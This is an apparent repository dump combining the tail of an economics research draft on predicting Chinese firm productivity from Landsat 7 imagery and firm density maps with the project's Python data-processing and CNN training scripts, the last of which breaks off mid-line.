BD-09 coordinate system, which is based on the GCJ-02 coordinate system, both of which are designed to intentionally obfuscate the exact location of given coordinates by applying a pseudo-random mapping to the true location ^[See [here](https://en.wikipedia.org/wiki/Restrictions_on_geographic_data_in_China) for more details]. Fortunately, there are existing fixed-point algorithms that can reliably invert these mappings with minimal impact on the resulting location accuracy.\n\n@! [bd_wgs_compare] Accuracy of uncorrected BD-09 versus corrected WGS-84 coordinates using a highly recognizable structure, the central pavilion of the Forbidden City in Beijing (distances in meters).\n\n\nAs can be seen in @[bd_wgs_compare], the accuracy loss from using uncorrected coordinates is on the order of 500 meters. This can be a substantial error when attempting to understand the importance of clustering in extremely dense areas such as that pictured above (central Beijing).\n\nIn addition to firm level data from the NBS, we also have linked patent data from the Chinese State Intellectual Property Office (SIPO). This data can be thought of as roughly comparable to patent data in the US context, although we do not currently have information on patent citations, making it impossible to compute citation weighted metrics. Thus we rely purely on patent counts and information on the technology class (IPC) that are filed under. We do not currently use the abstract text for this project ^[See Hanley and Luo (2018) for such an example in the clean technology space.].\n\nFinally, we employ satellite imagery to bring in additional information about the nature and structure of the environment in which the firms are operating. The most widely available public satellite data for this time period is that from Landsat 7, which is operated by the US Geographical Survey (USGS). Launched in 1999 and still operating today, it provides global coverage at 15 meter resolution in a variety of visible and non-visible frequencies. Unfortunately, an partial instrument failure in 2003 caused imagery produced thereafter to suffer from substantially lower quality. Thus, we only use data from 2003 or earlier and focus on the 2004 wave of firms data. @[landsat_demo] displays satellite imagery at various radii for a firm located in Shanghai.\n\n@! [landsat_demo] Landsat 7 imagery centered on Shanghai Happy Vacuum Cleaner Factory. Dark patches are areas of cloud cover.\n\n\nThe Landsat 7 imagery is generally fairly high quality. The major challenge is obtaining uniformly cloud-free coverage. Major providers like Google generally stitch together many sources for land locations (though less so for water locations). In our setting, we attempt to choose images with less than 20% cloud coverage within a range of a few months. However, since images are provided in cells of 100 kilometers on a side, it is not feasible to push this threshhold any lower without losing uniform land coverage.\n\n# Techniques\n\nThere are a wide variety of ways that cities and firms can be laid out. This including gridding patterns, geographic features like rivers, technology parks, and industrial zones. Some of this is partly determined by nature or decisions made long ago, while certain features are a product of contemporaneous decisions by governments or firms. Pictured in @[density_overlay] are maps of firm density in two cities of note: Shanghai and Xi'an.\n\n@! [density_overlay] Firm density at 15 meter cell resolution overlaid on satellite imagery of Shanghai (left) and Xi'an (right). Note the different distance scales.\n\n\nShanghai is, of course, notably larger in terms of population and area, though it is also quite a bit more dense with firms. The former is also distinguished by its division in two by the Huangpu River, though Xi'an itself is heavily influenced by its ancient city wall that surround core of roughly 1.5 by 2 kilometers. Another notable feature seen in the southwest quadrant of the firm density overlay is the Xi'an Hi-tech Industrial Development Zone.\n\nVarious methods have been developed to measure and quantify firm *clustering* (how they are arranged geographically, particularly at high density) and *agglomeration* (their tendency to group together by industry). Studies on the relationship between geographic concentration and firm growth require an accurate measure of firm location patterns. @[ellison1997geographic] using discrete spatial units like states to measure the location patterns of industries across regions. Discrete spatial units that capture relevant regional markets offer a reasonable starting point for understanding location patterns. @[maurel1999measure] and @[devereux2004geographic] develop alternative indices of localization taking similar approach. However, indices like @[ellison1997geographic] are always sensitive to the choice of regional boundaries, e.g., counties, cities or states. Outcomes may vary to a large degree when changing from one aggregation level to another. Furthermore, spatial divisions normally do not depend on economic characteristics but on administrative classifications.\n\n@[duranton2005testing] instead proposes analyzing spatial clustering using distance-based methods that do not discretize an area into spatial subunits but see it as a continuous space. Distance-based methods have a more longstanding tradition in disciplines such as forestry or astronomy but have rarely been used for spatial economics. This is mainly due to standard distance-based methods compare a point pattern with a theoretical topographic concentration, generally using a spatial Poisson process. However, in economics, this comparison is not meaningful since firms cannot settle anywhere. Locations of firms are highly restricted due to planning regularities, accessibility, and properties of the surface (mountains, lakes, swamps, etc.). To overcome the shortcomings of topographic measures, @[duranton2005testing] measure the spatial concentration of industry relative to the overall localization of firms in the area under investigation. A growing literature has applied this measure in understanding motivation for agglomeration (@[ellison2010causes], @[ellison2010causes]; @[alfaro2014global], @[alfaro2014global]). However, the use of the usage of this distance-based methods is not only limited by its high demand for spatially fine-grained data and computation but also not being able to measure the relative localization of individual firms.\n\nNonetheless, such aggregated measures discard much of the micro-structure of the rich, high-dimensional data we are drawing from. To address this, we propose taking advantage of recent advanced in deep learning motivated primarily by computer vision applications. The inputs are similar, namely two-dimensional maps and images, and the goal remains prediction. In the case, we don't wish to predict, say the identity or class of the object being depicted, but rather some outcome of the firm at the center of a particular map, such as productivity, profitability, patenting rate, or revenue growth.\n\nOne of the major challenges with such an approach is that much the information present the maps above, for instance the distance to the city core, are in fact proxies for other existing features such as industry. Thus the task is not to predict unconditional features, but to predict residuals left over after controlling for known factors. An alternative to this approach would also be to incorporate such features into a unified analysis and let the optimization algorithm sort out the proper weights.\n\n# Implementation\n\nOur chosen approach is to utilize a deep convolutional neural network (CNN) to predict residual firm profitability and firm growth after having partialed out such standard controls industry and firm age. CNNs have proven extremely effective at the task of image classification. Widely available databases of hand-labeled images have spurred heavy competition, and approaches such as those seen with AlexNet or Inception-v3 have yielded impressive results. Meanwhile, the development of less expensive, high powered GPUs has greatly expanded the scope of solvable problems. On top of this, the development of easier-to-use libraries such as Tensorflow (Google) and Torch (Facebook) has made such undertakings both easier and open to a wider class of researchers and practictioners.\n\nFor comparison, ImageNet has over 14M images in its database, while our dataset has 1.4M firms in 2004 and roughly 7.1M firms in 2008. Thus it is reasonable to think we could utilize models of similar or slightly smaller complexity. The application is of course slightly different in terms of the nature of the images at hand, so this is somewhat speculative at this stage. Recent approaches have included a technique known as transfer learning, wherein large, general classifiers are pretrained at industrial scale (generally by large technology companies such as Google), and are then tweaked on specific datasets for more specialized usages. This approach, while certainly useful, would be less applicable in this case, as the image domain is quite different from that of generic image classification.\n\n# Results\n\nTBD\n\n# References\n\n@@ [duranton2005testing]\ntitle: Testing for localization using micro-geographic data\nauthors: Gilles Duranton; Henry Overman\njournal: The Review of Economic Studies\nyear: 2005\ndoi: 10.1111/0034-6527.00362\n\n@@ [ellison1997geographic]\ntitle: Geographic concentration in US manufacturing industries: a dartboard approach\nauthors: Glenn Ellison; Edward Glaeser\njournal: Journal of Political Economy\nyear: 1997\ndoi: 10.1086/262098\n\n@@ [maurel1999measure]\ntitle: A measure of the geographic concentration in French manufacturing industries\nauthors: Françoise Maurel; Béatrice Sédillot\njournal: Regional Science and Urban Economics\nyear: 1999\ndoi: 10.1016/S0166-0462(99)00020-4\n\n@@ [devereux2004geographic]\ntitle: The geographic distribution of production activity in the UK\nauthors: Michael Devereux; Rachel Griffith; Helen Simpson\njournal: Regional Science and Urban Economics\nyear: 2004\ndoi: 10.1016/S0166-0462(03)00073-5\n\n@@ [alfaro2014global]\ntitle: The global agglomeration of multinational firms\nauthors: Laura Alfaro; Maggie Xiaoyang Chen\njournal: Journal of International Economics\nyear: 2014\ndoi: 10.1016/j.jinteco.2014.09.001\n\n@@ [ellison2010causes]\ntitle: What causes industry agglomeration? Evidence from coagglomeration patterns\nauthors: Glenn Ellison; Edward Glaeser; William Kerr\njournal: American Economic Review\nyear: 2010\ndoi: 10.1257/aer.100.3.1195"
},
{
"alpha_fraction": 0.6370967626571655,
"alphanum_fraction": 0.6651103496551514,
"avg_line_length": 37,
"blob_id": "88eea74ae3b856966343086b0bd2f4f12932ee9e",
"content_id": "b252b5ceb214e9743b865b07b8233e2fe809b4bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2356,
"license_type": "no_license",
"max_line_length": 171,
"num_lines": 62,
"path": "/code/train_run.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport sklearn.model_selection as sk\n\nimport train_data as data\nimport train_tools as tools\nimport train_models as models\n\nfrom mectools.plotter import plotter\nplt = plotter(backend='agg')\n\nfor gpu in tf.config.experimental.list_physical_devices('GPU'):\n tf.config.experimental.set_memory_growth(gpu, True)\n\n# path = 'data/tiles_fast/asie2003'\n# source = 'asie'\n# year = 2003\ndef load_dataset(path, source, year, channels=['density'], val_frac=0.2, batch_size=128, buf_size=10_000, landsat='mincloud2002', ivar='id', yvar='log_tfp', split='rand'):\n if source == 'asie':\n firms = data.load_asie_firms(year, landsat)\n elif source == 'census':\n firms = data.load_census_firms(year, landsat)\n\n # random geographic split\n if split == 'geo':\n state = np.random.RandomState(21921351)\n df_train, df_valid = tools.categ_split(firms, 'city', val_frac, state=state)\n print(len(df_valid)/(len(firms)))\n else:\n df_train, df_valid = sk.train_test_split(firms, test_size=val_frac)\n\n def parse_function(fid, out):\n image = tf.concat([data.load_tile(fid, f'{path}/{ch}') for ch in channels], -1)\n return (fid, image), out\n\n def make_dataset(df):\n fids = tf.constant(df[ivar])\n labels = tf.reshape(tf.cast(tf.constant(df[yvar]), tf.float32), (-1, 1))\n data = tf.data.Dataset.from_tensor_slices((fids, labels))\n data = data.map(parse_function)\n data = data.shuffle(buffer_size=buf_size)\n data = data.batch(batch_size)\n data = data.repeat()\n return data\n\n return make_dataset(df_train), make_dataset(df_valid)\n\ndef train_model(train, valid, pix=256, nchan=1, epochs=5, steps_per_epoch=2000, validation_steps=100):\n model = models.gen_dual_medium(pix, nchan)\n history = model.fit(train, validation_data=valid, epochs=epochs, steps_per_epoch=steps_per_epoch, validation_steps=validation_steps)\n return model, history\n\ndef plot_variation(model, dataset, save=None):\n x_test, y_test, yh_test = tools.predict_data(model, dataset, 100)\n fig, (ax0, ax1) = plt.subplots(ncols=2, figsize=(11, 5))\n tools.eval_model(y_test, yh_test, N=10, axs=(ax0, ax1), qmin=0.02, qmax=0.98)\n if save is not None:\n fig.savefig(save)\n return fig\n"
},
{
"alpha_fraction": 0.5650208592414856,
"alphanum_fraction": 0.5792768001556396,
"avg_line_length": 31.314607620239258,
"blob_id": "345e38c78dbb27f48173a0fbe85cb50355eb8f4d",
"content_id": "f3aa372442536bcc53961fc9bd2c603fdb21bfe3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2876,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 89,
"path": "/code/torch_tools.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "from os import path\nfrom glob import glob\nfrom PIL import Image\n\nimport torch\nimport torch.nn.functional as F\nfrom torch.utils import data\nfrom torchvision.models import resnet\n\ndef pil_loader(path):\n with open(path, 'rb') as f:\n img = Image.open(f)\n return img.convert()\n\ndef gen_path(i):\n tag = f'{i:07d}'\n sub = tag[:4]\n return f'{sub}/{tag}'\n\nclass ImageDataset(data.Dataset):\n def __init__(self, sources, metadata, transform=None, ext='jpg'):\n self.ids = metadata.index.tolist()\n self.data = torch.tensor(metadata.to_numpy(), dtype=torch.float)\n\n self.sources = sources\n self.paths = [f'{gen_path(i)}.{ext}' for i in self.ids]\n\n self.transform = transform\n\n def __getitem__(self, idx):\n path, data = self.paths[idx], self.data[idx]\n imgs = torch.cat([\n self.transform(pil_loader(f'{src}/{path}')) for src in self.sources\n ])\n return imgs, data\n \n def __len__(self):\n return len(self.ids)\n\ndef make_resnet(nchan=1, nclass=1):\n model = resnet.ResNet(resnet.BasicBlock, [2, 2, 2, 2], num_classes=nclass)\n model.conv1 = nn.Conv2d(nchan, 64, kernel_size=7, stride=2, padding=3, bias=False)\n return model\n\ndef loss_function(y, yh, scale=100):\n return scale*F.mse_loss(yh, y)\n\ndef train(model, loader, optim, epoch):\n log_interval = len(loader.dataset) // loader.batch_size // 5\n model.train()\n train_loss = 0\n for batch_idx, data in enumerate(loader):\n img, stat = data[0].to('cuda'), data[1].to('cuda')\n optim.zero_grad()\n pred = model(img).squeeze(1)\n loss = loss_function(pred, stat)\n loss.backward()\n train_loss += loss.item()\n optim.step()\n if batch_idx % log_interval == 0:\n print('Train Epoch: {} [{:06d}/{} ({:2.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(stat), len(loader.dataset),\n 100. * batch_idx / len(loader),\n loss.item() / len(stat)))\n\ndef test(model, loader, epoch):\n model.eval()\n test_loss = 0\n with torch.no_grad():\n for batch_idx, data in enumerate(loader):\n img, stat = data[0].to('cuda'), data[1].to('cuda')\n pred = model(img).squeeze(1)\n test_loss += loss_function(pred, stat).item()\n avg_loss = test_loss / len(loader.dataset)\n print(f'====> Test set loss: {avg_loss:.4f}')\n\ndef evaluate(model, loader):\n model.eval()\n with torch.no_grad():\n stat_list = []\n pred_list = []\n for batch_idx, data in enumerate(loader):\n img, stat = data[0].to('cuda'), data[1].to('cuda')\n pred = model(img).squeeze(1)\n stat_list.append(stat)\n pred_list.append(pred)\n stat_list = torch.cat(stat_list)\n pred_list = torch.cat(pred_list)\n return stat_list, pred_list\n"
},
{
"alpha_fraction": 0.6068548560142517,
"alphanum_fraction": 0.6198156476020813,
"avg_line_length": 34.42856979370117,
"blob_id": "fc8ae54fcdbeee7cbe00a0fff4faff07b67a6bfa",
"content_id": "ec624a4b2d3db1e79170efa9685cd3b08b700fee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3472,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 98,
"path": "/code/train_data.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport statsmodels.formula.api as smf\nimport tensorflow as tf\n\nimport mectools.data as dt\n\nimport train_schema as schema\n\n##\n## firm loading\n##\n\ndef load_asie_firms(year, landsat, drop=True):\n # load in firm and location data\n cols = schema.asie[year]\n firms = pd.read_csv(f'../data/firms/asie{year}_geocode.csv', usecols=cols).rename(cols, axis=1)\n targ = pd.read_csv(f'../index/firms/asie{year}_{landsat}.csv', usecols=['id', 'lat_wgs84', 'lon_wgs84', 'prod_id'])\n firms = pd.merge(firms, targ, on='id', how='left').dropna(subset=['id', 'sic4', 'prod_id', 'prefecture'])\n\n # regulate id\n firms['id'] = firms['id'].astype(np.int)\n firms['sic4'] = firms['sic4'].astype(np.int)\n firms = firms.drop_duplicates(subset='id').set_index('id', drop=False)\n \n # geographic location\n firms['prefecture'] = pd.to_numeric(firms['prefecture'], errors='coerce').astype(np.int)\n firms['city'] = firms['prefecture'].apply(lambda x: int(str(x)[:3]))\n\n # industry classify\n firms['sic3'] = firms['sic4'] // 10\n firms['sic2'] = firms['sic4'] // 100\n\n # calculate outcome stats\n firms['prod'] = firms['value_added']/firms['employees']\n\n # logify\n for c in ['value_added', 'assets_fixed', 'wages', 'prod']:\n firms[f'log_{c}'] = dt.log(firms[c])\n\n # filter out bad ones\n if drop:\n firms = firms.dropna(subset=['log_value_added', 'log_assets_fixed', 'log_wages'])\n\n # compute tfp as residual\n firms['log_tfp'] = smf.ols('log_value_added ~ log_assets_fixed + log_wages', data=firms).fit().resid\n firms['log_tfp_resid'] = smf.ols('log_tfp ~ C(sic2) + C(city)', data=firms).fit().resid\n firms['log_prod_resid'] = smf.ols('log_prod ~ C(sic2) + C(city)', data=firms).fit().resid\n\n return firms\n\ndef load_census_firms(year, landsat):\n # load in firm and location data\n cols = schema.census[year]\n firms = pd.read_csv(f'../data/firms/census{year}_geocode.csv', usecols=cols).rename(cols, axis=1)\n targ = pd.read_csv(f'../index/firms/census{year}_{landsat}.csv', usecols=['id', 'lat_wgs84', 'lon_wgs84', 'prod_id'])\n firms = pd.merge(firms, targ, on='id', how='left').dropna(subset=['id', 'sic4', 'prod_id', 'location_code'])\n\n # regulate id\n firms['id'] = firms['id'].astype(np.int)\n firms['sic4'] = firms['sic4'].astype(np.int)\n firms = firms.drop_duplicates(subset='id').set_index('id', drop=False)\n\n # geographic location\n firms['prefecture'] = firms['location_code'].astype(np.int).apply(lambda x: int(str(x)[:4]))\n firms['city'] = firms['prefecture'].apply(lambda x: int(str(x)[:3]))\n\n # industry classify\n firms['sic3'] = firms['sic4'] // 10\n firms['sic2'] = firms['sic4'] // 100\n\n # calculate outcome stats\n firms['prod'] = firms['income']/firms['employees']\n\n # logify\n for c in ['income', 'prod']:\n firms[f'log_{c}'] = dt.log(firms[c])\n\n # filter out bad ones\n firms = firms.dropna(subset=['log_income', 'log_prod'])\n\n # compute tfp as residual\n firms['log_prod_resid'] = smf.ols('log_prod ~ C(sic2)', data=firms).fit().resid\n\n return firms\n\n##\n## image loading\n##\n\ndef load_tile(fid, base, ext='jpg'):\n tag = tf.strings.as_string(fid, width=7, fill='0')\n sub = tf.strings.substr(tag, 0, 4)\n fn = tf.strings.join([tag, ext], '.')\n fp = tf.strings.join([base, sub, fn], '/')\n dat = tf.io.read_file(fp)\n img = tf.image.decode_jpeg(dat, channels=1)\n return img\n"
},
{
"alpha_fraction": 0.6353775262832642,
"alphanum_fraction": 0.664997935295105,
"avg_line_length": 43.38888931274414,
"blob_id": "daac7fe8a87181d517af5b7a008143587ab3ea10",
"content_id": "800c0f48bdecc1a202909217bd747074e98ade66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2397,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 54,
"path": "/code/firm_scenes.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "import argparse\nimport numpy as np\nimport pandas as pd\nfrom coord_transform import bd2wgs, wgs2utm\n\n# python3 firm_scenes.py data/firms/census2004_geocode.csv index/firms/census2004_mincloud2002.csv --index index/scenes/google_scenes_2002_mincloud.csv\n\nparser = argparse.ArgumentParser(description='Index which scene each firm belongs to.')\nparser.add_argument('firms', type=str, help='path to firm location data')\nparser.add_argument('output', type=str, help='path to output file')\nparser.add_argument('--index', type=str, help='scene index to use')\nargs = parser.parse_args()\n\n# load firm data\nfirms = pd.read_csv(args.firms, usecols=['id', 'sic4', 'lon_bd09', 'lat_bd09'])\nfirms = firms[(firms['id'] % 1) == 0]\nfirms['id'] = firms['id'].astype('Int64')\nfirms['sic4'] = firms['sic4'].astype('Int64')\nfirms = firms.dropna()\n\n# load index data\nindex = pd.read_csv(args.index, usecols=['PRODUCT_ID', 'NORTH_LAT', 'SOUTH_LAT', 'EAST_LON', 'WEST_LON']).dropna()\nindex = index.rename(columns={'PRODUCT_ID': 'prod_id'})\n\n# find scene centers\nindex['cent_lon'] = 0.5*(index['WEST_LON']+index['EAST_LON'])\nindex['cent_lat'] = 0.5*(index['NORTH_LAT']+index['SOUTH_LAT'])\n\n# analytic transformations\nfirms[['lon_wgs84', 'lat_wgs84']] = firms[['lon_bd09', 'lat_bd09']].apply(lambda lonlat: list(bd2wgs(*lonlat)), raw=True, result_type='expand', axis=1)\nfirms['utm_zone'] = firms[['lon_wgs84', 'lat_wgs84']].apply(lambda lonlat: wgs2utm(*lonlat), raw=True, axis=1)\n\n# find scenes containing firms\nmatch_firm, match_scene = np.nonzero(\n (index['NORTH_LAT'][None,:] >= firms['lat_wgs84'][:,None])\n & (index['SOUTH_LAT'][None,:] <= firms['lat_wgs84'][:,None])\n & (index['EAST_LON' ][None,:] >= firms['lon_wgs84'][:,None])\n & (index['WEST_LON' ][None,:] <= firms['lon_wgs84'][:,None])\n)\nmatch = pd.DataFrame({\n 'id': firms['id'].iloc[match_firm].values,\n 'prod_id': index['prod_id'].iloc[match_scene].values\n})\n\n# find best match scenes\nmatch = match.merge(firms[['id', 'sic4', 'lon_wgs84', 'lat_wgs84']], on='id')\nmatch = match.merge(index[['prod_id', 'cent_lon', 'cent_lat']], on='prod_id')\nmatch['dist'] = np.sqrt((match['cent_lon']-match['lon_wgs84'])**2+(match['cent_lat']-match['lat_wgs84'])**2)\nbest = match.groupby('id')['dist'].idxmax()\nprods = match[['id', 'prod_id']].loc[best]\nfirms = firms.merge(prods, on='id', how='left')\n\n# save results\nfirms.to_csv(args.output, index=False)\n"
},
{
"alpha_fraction": 0.6872881650924683,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 37.064517974853516,
"blob_id": "a65a03456c0471827d250b62f1b2b8597322ec90",
"content_id": "c06c73c67aed48eb633b5065da802451ba21e03a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1180,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 31,
"path": "/code/thumbnails.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "#!/bin/env python3\n\nimport os\nimport glob\nimport argparse\nfrom PIL import Image\n\nparser = argparse.ArgumentParser(description='Generate list of scenes matching certain criterion.')\nparser.add_argument('--input', type=str, default='scenes', help='directory to intput from')\nparser.add_argument('--output', type=str, default='thumbs', help='directory to output to')\nparser.add_argument('--size', type=int, default=512, help='thumbnail size')\nparser.add_argument('--format', type=str, default='png', help='image format for output')\nparser.add_argument('--overwrite', action='store_true', help='whether to overwrite existing')\nargs = parser.parse_args()\n\nImage.MAX_IMAGE_PIXELS = 1000000000\nsize = (args.size, args.size)\n\nthumb_list = []\nfor fn in glob.glob(f'{args .input}/*.TIF'):\n dpath, fname = os.path.split(fn)\n fbase, _ = os.path.splitext(fname)\n tpath = f'{args.output}/{fbase}.{args.format}'\n if args.overwrite or not os.path.isfile(tpath):\n thumb_list.append((fn, tpath))\n\nfor spath, tpath in sorted(thumb_list, key=lambda x: x[0]):\n print(f'Converting: {spath} -> {tpath}')\n im = Image.open(spath)\n thumb = im.resize(size)\n thumb.save(tpath)\n"
},
{
"alpha_fraction": 0.6595821380615234,
"alphanum_fraction": 0.7071325778961182,
"avg_line_length": 58.0638313293457,
"blob_id": "b64030de6d2be285c76cfb079598d6cf16035294",
"content_id": "e9264ffd5d04822dec81f78cb39ee02c90f58be9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2776,
"license_type": "no_license",
"max_line_length": 244,
"num_lines": 47,
"path": "/code/filter_scenes.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "import argparse\nimport pandas as pd\n\n# python3 generate_targets.py --index=index/landsat/google_landsat_index.csv --output=index/scenes/google_scenes_2002.csv --lat_min=15 --lat_max=55 --lon_min=70 --lon_max=135 --date_min=\"2002-01-01\" --date_max=\"2002-12-31\"\n# python3 generate_targets.py --index=index/landsat/google_landsat_index.csv --output=index/scenes/google_scenes_2002_cloud.csv --lat_min=15 --lat_max=55 --lon_min=70 --lon_max=135 --date_min=\"2002-01-01\" --date_max=\"2002-12-31\" --cloud_max=20\n# python3 generate_targets.py --index=index/landsat/google_landsat_index.csv --output=index/scenes/google_scenes_2007_summer.csv --lat_min=15 --lat_max=55 --lon_min=70 --lon_max=135 --date_min=\"2002-03-01\" --date_max=\"2002-08-31\" --cloud_max=20\n# python3 generate_targets.py --index=index/landsat/google_landsat_index.csv --output=index/scenes/google_scenes_2002_mincloud.csv --lat_min=15 --lat_max=55 --lon_min=70 --lon_max=135 --date_min=\"2002-03-01\" --date_max=\"2002-08-31\"\n\nparser = argparse.ArgumentParser(description='Generate list of scenes matching certain criterion.')\nparser.add_argument('--index', type=str, help='path to full index')\nparser.add_argument('--output', type=str, help='path to output to')\nparser.add_argument('--lat_min', type=int, help='minimal WRS path to use')\nparser.add_argument('--lat_max', type=int, help='maximal WRS path to use')\nparser.add_argument('--lon_min', type=int, help='minimal WRS row to use')\nparser.add_argument('--lon_max', type=int, help='maximal WRS row to use')\nparser.add_argument('--date_min', type=str, help='minimal date to use')\nparser.add_argument('--date_max', type=str, help='maximal date to use')\nparser.add_argument('--cloud_max', type=int, default=100, help='maximal allowed cloud cover (out of 100)')\nparser.add_argument('--spacecraft', type=str, default='LANDSAT_7', help='spacecraft to use')\nargs = parser.parse_args()\n\nprint('loading full index')\nindex = pd.read_csv(args.index).dropna(subset=['PRODUCT_ID'])\n\nprint('selecting on spacecraft')\nindex = index.query(f'SPACECRAFT_ID == \"{args.spacecraft}\"')\n\nprint('selecting on location')\nindex = index[\n (index['NORTH_LAT'] >= args.lat_min) &\n (index['SOUTH_LAT'] <= args.lat_max) &\n (index['EAST_LON' ] >= args.lon_min) &\n (index['WEST_LON' ] <= args.lon_max)\n]\n\nprint('selecting on date')\nindex['DATE_ACQUIRED'] = pd.to_datetime(index['DATE_ACQUIRED'])\nindex = index.query(f'DATE_ACQUIRED >= \"{args.date_min}\" and DATE_ACQUIRED <= \"{args.date_max}\"')\n\nprint('selecting on cloud cover')\nindex = index.query(f'CLOUD_COVER >= 0 and CLOUD_COVER <= {args.cloud_max}')\n\nprint('finding most recent match')\nindex = index.loc[index.groupby(['WRS_PATH', 'WRS_ROW'])['CLOUD_COVER'].idxmin()]\n\nprint('saving to file')\nindex.to_csv(args.output, index=False)\n"
},
{
"alpha_fraction": 0.49058693647384644,
"alphanum_fraction": 0.5127353072166443,
"avg_line_length": 19.522727966308594,
"blob_id": "ddda0608f5faefe03d4c0540b869dea828f7e6c9",
"content_id": "3196816076f8238c9a2576e359c807a2ec1d20a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1157,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 44,
"path": "/code/train_schema.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "census = {}\n\ncensus[2004] = {\n 'id': 'id',\n 'sic4': 'sic4',\n 'location_code': 'location_code',\n 'income': 'income',\n 'total_assets': 'assets',\n 'employees': 'employees'\n}\n\nasie = {}\n\nasie[2003] = {\n 'id': 'id',\n 'sic4': 'sic4',\n '省地县码': 'prefecture',\n '工业总产值(不变价)': 'output',\n '工业增加值': 'value_added',\n '从业人数': 'employees',\n '固定资产合计': 'assets_fixed',\n '无形资产': 'assets_intan',\n '资产总计': 'assets_total',\n '本年应付工资总额': 'wages',\n '工业中间投入合计': 'inputs',\n '利润总额': 'profit',\n '利税总额': 'profit_taxes'\n}\n\nasie[2010] = {\n 'id': 'id',\n 'sic4': 'sic4',\n 'B05': 'prefecture',\n '工业总产值当年价格': 'output',\n '工业增加值': 'value_added',\n '年末从业人员合计_总计': 'employees',\n '固定资产合计': 'assets_fixed',\n '无形资产': 'assets_intan',\n '资产总计': 'assets_total',\n '其中主营业务应付工资总额': 'wages',\n '工业中间投入合计': 'inputs',\n '利润总额': 'profit',\n '利税总额': 'profit_taxes'\n}\n"
},
{
"alpha_fraction": 0.6196682453155518,
"alphanum_fraction": 0.6430687308311462,
"avg_line_length": 37.804595947265625,
"blob_id": "70deddbd7626b0e9f17928699c3fa2a4da5b7012",
"content_id": "138e382ee142ebd23293b4453bc9f049f5946640",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3376,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 87,
"path": "/code/firm_density.py",
"repo_name": "iamlemec/landsat",
"src_encoding": "UTF-8",
"text": "# generate an atlas: a collection of locally flat maps, one for each relevant UTM zone\n\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport scipy.sparse as sp\nfrom PIL import Image\nfrom pyproj import Proj\nfrom coord_transform import bd2wgs, wgs2utm\nfrom mectools.hyper import progress\n\nparser = argparse.ArgumentParser(description='Generate clusting and information')\nparser.add_argument('data', type=str, help='Path to firm data file')\nparser.add_argument('dense', type=str, help='Density directory')\nargs = parser.parse_args()\n\n# tools\ndef argify(f):\n def f1(x):\n y = f(*x)\n return list(y) if type(y) is tuple else y\n return f1\n\n# utm gridding\nsize = 1e6 # kilometers\npixel = 15 # meters\nN = int(np.round(size/pixel))\nulon = np.linspace(-size/2, size/2, N+1)\nulat = np.linspace(-size/2, size/2, N+1)\n\n# utm info\nutm_cent = pd.read_csv('meta/utm_centers.csv', index_col='utm')\nutm_cent['lon_west'] = utm_cent['lon'] - 3\nutm_cent['lon_east'] = utm_cent['lon'] + 3\nutm_cent['lat_north'] = utm_cent['lat'] + 4\nutm_cent['lat_south'] = utm_cent['lat'] - 4\nutm_cent['utm_west'] = utm_cent['east'] - size/2\nutm_cent['utm_east'] = utm_cent['east'] + size/2\nutm_cent['utm_north'] = utm_cent['north'] + size/2\nutm_cent['utm_south'] = utm_cent['north'] - size/2\nutm_cent['size'] = size\nutm_cent['pixel'] = pixel\nutm_cent['N'] = N\n\n# load firm data\nfirms = pd.read_csv(args.data)\nfirms['id'] = firms['id'].astype(np.int)\nfirms['sic4'] = firms['sic4'].astype(np.int)\nfirms['sic2'] = firms['sic4'] // 100\n\n# find all relevant UTM zones and make converters\nutm_zones = sorted(firms['utm_zone'].unique())\nutm_proj = {z: Proj(f'+proj=utm +zone={z}, +ellps=WGS84 +datum=WGS84 +units=m +no_defs') for z in utm_zones}\nprint(utm_zones)\n\n# save utm cell info\nutm_cent.loc[utm_zones].to_csv(f'{args.dense}/utm_cells.csv')\n\n# group by utm zone and compute histograms\ndense = {}\nfor zone, idx in firms.groupby('utm_zone').groups.items():\n this_cent = utm_cent.loc[zone]\n df = firms[\n (firms['lon_wgs84'] >= this_cent['lon_west'] - 2) &\n (firms['lon_wgs84'] < this_cent['lon_east'] + 2) &\n (firms['lat_wgs84'] >= this_cent['lat_south'] - 2) &\n (firms['lat_wgs84'] < this_cent['lat_north'] + 2)\n ].copy()\n\n this_proj = utm_proj[zone]\n df[['utm_east', 'utm_north']] = df[['lon_wgs84', 'lat_wgs84']].apply(argify(this_proj), raw=True, result_type='expand', axis=1)\n df['utm0_east'] = df['utm_east'] - this_cent.loc['east'] # recenter coordinates\n df['utm0_north'] = df['utm_north'] - this_cent.loc['north'] # recenter coordinates\n\n df['pix_east'] = np.digitize(df['utm0_east'], ulon)\n df['pix_north'] = np.digitize(df['utm0_north'], ulat)\n df1 = df[(df['pix_east']>0)&(df['pix_east']<N+1)&(df['pix_north']>0)&(df['pix_north']<N+1)]\n df1[['pix_east', 'pix_north']] -= 